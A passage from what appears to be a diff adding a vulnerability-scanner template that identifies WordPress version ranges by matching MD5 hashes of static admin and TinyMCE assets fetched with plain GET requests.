3.5 - 3.5.2 + dsl: + - "(\"fd063343a877ac481220c41e49ee8f4f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/about-media.png" + matchers: + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"5b3063ef865b732f9fde36bfa7d26f3f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/about-twenty-twelve.png" + matchers: + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"e9bbcb3c6459eab990f96fad803359c5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/js/editimage.min.js" + matchers: + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"b7f2ab839344415015809824e6d1ee27\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/cat.js" + matchers: + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"7060f71460529e6377416bb39ae61408\" == md5(body))" + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"8a0487d34029c6621081f5a89d91a82d\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"fbf652a8b7d8ec28b85d3398d36099aa\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"6942a4d0bc06b51ae402ec77f08bae0b\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/js/cat.min.js" + matchers: + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"6e76c426994895bb6e9a574fe3b01048\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wpmini-blue-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"13e7ab1ac2f6c77f177c849576bfdf31\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wpmini-blue.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"e8d9359697813d9df251808ec4b58b71\" == md5(body))" + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"46b52530984eff532be3372596c66386\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/thickbox/tb-close.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"19efae1b275c9c70a783799e259e059e\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"7c088dbddefa7aff7a860580a98f3e30\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/thickbox/tb-close-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"ae65a3a2de0cb24ecef3065a1618fdac\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/more_bug.gif" + matchers: + - type: dsl + name: 3.4 - 3.7.35 + dsl: + - "(\"c38cc928b95c0be49ec083648084d190\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/page_bug.gif" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"ea31916969e5255f353febf4b9b55a38\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"32a68c86a6beffdd042abf0b0c595328\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/press-this-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"8be606bebfbff936f7d6ac3927be1337\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows-pr-2x.png" + matchers: + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - 
"(\"b008e43aab25a6a2cd4ef2f0a5c4bfba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/stars-rtl.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"a3c107d957897a323b9801eb7a0479ad\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7dcc04a095e8470670d74e0de8c7bd1a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows-dark-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"bc97d62061c943dd6ff71d964c7d8425\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wordpress-logo-2x.png" + matchers: + - type: dsl + name: 3.4 - 3.7.35 + dsl: + - "(\"784aa9fed2f19f1607cae85205507163\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows-pr.png" + matchers: + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"df60fed3e762a0b86903b629f90ffd79\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/press-this.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"beef1f704b00931544c0ddb07933c498\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"e738cdc2da9198b7af77ba33fbb752a8\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"770f9ca889019ef90fae6b92307844b1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows-vs.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"7d5abe2a367e42e87482743521166c1f\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"da70ee9298cc0b46e14af7221b8f47cd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows-dark-vs.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"a7bd090aa6d1cd54ec9f2a9ccc1043db\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"7bb6c8eefdfb40b73cefc66b3d89bd5a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/about-updates-2x.png" + matchers: + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - 
"(\"c041e28a6ea33aa206cf9b43c3b1f428\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows-vs-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"550a69654948fc739ae5f9a537106cb4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows-dark-vs-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"bf96d253f8dfcad84f9d649de07dd797\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wp-logo-vs-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"13e7ab1ac2f6c77f177c849576bfdf31\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wp-badge.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"73b244635671611458e874a20707135d\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"1912d3a313bc7f8f75af486578bf62b1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/bubble_bg-rtl-2x.gif" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"507ddcae331a55002d8e006a8ea0504c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/stars-rtl-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"6ec2333cc32894b25402a1d21924a6c9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/welcome-icons.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"ebbeff45f2fee9bef30233451be6c87f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wp-logo-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"e0c1cc94af35c8b495e35e9e6fbdad05\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows-dark.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"8b77c74d3b2eec1f50bb59ae34bdb5ff\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"656e3c3b11412ae5c595f1bda2bd8a99\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/images/wp-badge-2x.png" + matchers: + - type: dsl + name: 3.4 - 3.7.35 + dsl: + - "(\"958efa9f64653d25a424ad21cd16dac1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/about-globe-2x.png" + matchers: + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"3003678c6ccc6f4c874f01e58dee454b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/about-search-2x.png" + matchers: + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"ae40cbce246b6f3ea4d95b05939a92d6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/welcome-icons-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"520a173799e42122f793bed6c3c8fd64\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wp-logo.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"7052395c86de7a8a3c2328e7d134680d\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"3ead5afa19537170bb980924397b70d6\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"f83458e18cccab400294d6c0643a51cd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-shadow-rtl.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"6238d00c97d2f2fb553405d2cbd800b5\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"4d835884b29a5a91e4bb9fe1b1ba7e01\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wp-logo-vs.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"e8d9359697813d9df251808ec4b58b71\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"46b52530984eff532be3372596c66386\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"8fc9d821d334b9534cb9b1b66a18498d\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"331b0948ff75aa7e7f336387572029aa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/bubble_bg-rtl.gif" + matchers: + - type: dsl + name: 2.7 - 
3.7.35 + dsl: + - "(\"0acb13b5fb21466f3984a5a3bdfc3869\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-shadow.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"91c68df0c5f4d4b84de19f51dbe4f3b7\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"7197be58fb0b972896f588341f400f4f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-classic.min.css" + matchers: + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"ee2d3f9b681056eb0c8c1a1703c110b2\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"6f75a7097c3ebc035d87ade4762f1800\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"02bd813359a3beef07d99f5f14b2a5c1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-fresh.min.css" + matchers: + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"e67f2d5d990caf64736f32b9ca54a950\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"135ed0d18597afe32bbfaf21c20e8587\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"3f14edb51035e43f31b24e8a3cf2552c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/about.js" + matchers: + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"753ddfb43ade0f3fb4c00b010bdeec60\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/about.min.js" + matchers: + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"5644f43ee3e5a30fdcd478cd44c698f5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/plupload.flash.js" + matchers: + - type: dsl + name: 3.6 - 3.8.13 + dsl: + - "(\"4f9797db7014eb90511683e54dd80318\" == md5(body))" + - type: dsl + name: 3.7.14 - 3.8.35 + dsl: + - "(\"7bc0ee636b3b83484fc3b9348863bd22\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.5.2 + dsl: + - "(\"4c84570d1147590363953bd6c694966b\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.1 + dsl: + - "(\"37b53904bf82e18d1fc0c92434617684\" == md5(body))" + - method: GET 
+ path: + - "{{BaseURL}}/wp-includes/js/plupload/changelog.txt" + matchers: + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"01928d3405b7c4b0d5f82e1c8e1b4ac1\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"15bab07382420b0fd20cdbf308cad0cc\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.5 + dsl: + - "(\"ca2c3fb188295605bfabaaef64114554\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.1 + dsl: + - "(\"ce86f17aad09c14569675f27a8ee304a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/plupload.html5.js" + matchers: + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"3fbc939309e4ab58452cd744892ab575\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"3229c9876dd8f4f2f2d6ec090e57fb13\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.5 + dsl: + - "(\"ec192acff96dee19dd49e52d43f6240e\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.1 + dsl: + - "(\"836d773c9e8efc8c15f6168bfcd08700\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/plupload.silverlight.js" + matchers: + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"56cb2a0e7a1e792a1a803aa3a527d7d6\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"20ff795950f0ef3b5115682db8f4111e\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.5 + dsl: + - "(\"4152d57d9dcf7ea975bb05043e53a83e\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.1 + dsl: + - "(\"e39810e51490907d70cb724175e27a7c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/plupload.html4.js" + matchers: + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"5f70abca09e28bbde851a604ebd9e76f\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.5.2 + dsl: + - "(\"851cc71705ebc4c9731a6673e3dfc3cf\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.1 + dsl: + - "(\"734fe87262125790dd0e51428322bc73\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/dialog.css" + matchers: + - type: dsl 
+ name: 3.8 - 3.8.35 + dsl: + - "(\"2512108fca85f5d904ee6e0042180c85\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"43382eca508513e60da47f8becb0e1fd\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"3c9238e8e6e13af9fcbcf099335d17ee\" == md5(body))" + - type: dsl + name: 2.8 - 3.2.1 + dsl: + - "(\"9c93f6a41d7c635d738dd6796536a7c3\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"d490a91bd83042db45637b7147382f8d\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"46a1fb44a7971c5f203ebb8109ae4e3b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/embedded.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"1fc0d1771755f5ce441c1dd278b3a495\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"1fad35f87373d2784de6c125ce3942ed\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/tabs.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"6473bbcd0a011e9fcdd9f777ef437410\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"93f97588a35da1f45fdcb975d4380913\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/mce-nextpage.png" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"1601cf739eb25c25208344cf3b28ab71\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/gallery.png" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"87cb768e68c38f31ff91a0921d4ea0d8\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"fbcde0be231a69f57bf2ef8515a75b09\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"1f35ba36cb43f1c5382a13e6941483df\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/mce-more.png" + 
matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"2325f2bd490235cde0e08d3000d2fd02\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/gallery-2x.png" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"406ccfcbc06224cb89a5c524cf4bc69a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/mce-more-2x.png" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"049ab5d6aec48ea7cd8a380e4785c096\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/mce-nextpage-2x.png" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"4a6f3e665911a3a0c081414a6227e5fb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/dialog.css" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"0ceb1bc740c467971507606441d36d7c\" == md5(body))" + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"56b99f4e744b576fc0b79da0a997f328\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"61f260cc574683934afbb0af6917179c\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"2c50db59d058317010775677fee63ac3\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"950b230e8c783672e82dd1f4977d6df3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/img/items.gif" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"d201498a710fc8aac6e117820b9814b7\" == md5(body))" + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"5cb42865ce70a58d420786854fed4ae1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/img/menu_arrow.gif" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"e21752451a9d80e276fef7b602bdbdba\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/img/menu_check.gif" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"c7d003885737f94768eecae49dcbca63\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/img/tabs.gif" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"6473bbcd0a011e9fcdd9f777ef437410\" == md5(body))" + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"93f97588a35da1f45fdcb975d4380913\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/img/progress.gif" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"50c5e3e79b276c92df6cc52caeb464f0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/img/buttons.png" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"33b2f2e08cc3ade5254fec64c4183558\" == md5(body))" + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"1e0acdc2135897e6a95bb40cfde2fbc6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/dialog.css" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"b66af30667a23ece1521fe354331c534\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"b8df654e244dce02616deee320db0a88\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/content.css" + matchers: + - type: dsl + name: 3.4 - 3.8.35 + dsl: + - "(\"581e2436d2cafd2141f4a75657e06245\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"afd85a39de6c920b04b88d4a04b83938\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"719a5228674fb83e322f29efa90b950e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/ui.css" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - 
"(\"8beb8f4a330b1294c488f435873328ef\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"cd943049a33bbda3d7c53c16c3b644cc\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"68151de213c5a93151398138c4c88ef3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/ui_silver.css" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"f66b026fe40921b62c0b77798876760a\" == md5(body))" + - type: dsl + name: 2.7 - 3.1.4 + dsl: + - "(\"623a420867f1da38168b5ab0eac1afcc\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"7b4e376df8959facda1645ab2853aec4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/dialog.css" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"084f7ce623cd2965a01f65c763f88eab\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"b6ccc7c5502dae22838aa47a0e2267a0\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"da587a5b75a903f0ab0bb5037dbb3395\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"55252ba2c0ed8e6cf62e28e111cb3b4d\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"32d8369bcd5f49067b6c0905b2bb6971\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"7c44580a01044be04ef075f9f28c99d2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/button_bg_silver.png" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"15fbf2b4a20dbaa86205af6764f4fee4\" == md5(body))" + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"5690ef573f4dc74ec3eb4d101806976e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/button_bg_black.png" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"9645f90b37102a3618a52be18b74b02b\" == md5(body))" + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - 
"(\"a5ad448e9c25120cb7e05fffe4a6234f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/button_bg.png" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"36fd9fbd748860f515df259443367163\" == md5(body))" + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"8c9b1f0ee9deb6374983650edbd6ddfc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/ui_black.css" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"02a164ba69ca7d9182047b24944e1d69\" == md5(body))" + - type: dsl + name: 2.7 - 3.1.4 + dsl: + - "(\"dd03578fd4e33798de6d86c4564e4c66\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"41aa12855030ea15a9bb709c8cef254a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/quicktime.gif" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"61da1ff8729ca5016344c4e8eb173369\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"9a6a9fdead205b125c07ea37e71ed4f1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/shockwave.gif" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"1ce7d48784981aac9d4375cf2effdc4d\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"baa643b587565755157618032dc93e3c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/iframe.gif" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"a1af02e9ba370f64297087b46e80591e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/realmedia.gif" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"b9734ee16d790e67bea01046feba28b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/trans.gif" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - 
"(\"12bf9e19374920de3146a64775f46a5e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/colorpicker.jpg" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"9bcc36292defe94bca5a013a1736c7d7\" == md5(body))" + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"02ae48639aa5729e6a40fb64455c32a2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/gotmoxie.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"d97b715d73a13adef309a8a7103acb45\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"c1fb3ef2ad854a88d9eb8ee32d15e4ad\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/flash.gif" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"33adee48d32bbbba3e6412cc54ecf335\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"6c69b02015d09280332ff8b07e4ea2f3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/windowsmedia.gif" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"c327cd167b3a7bc263d908b0d0154ead\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/pagebreak.gif" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"48872075f721bf57a517e3275d61c0ba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/video.gif" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"f85c56813ea016a75e496bba50d66ab4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/icons.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"75ad72872bc6280c32609e12fc3b610a\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"7316b39211892b53eac6f76da7615461\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - 
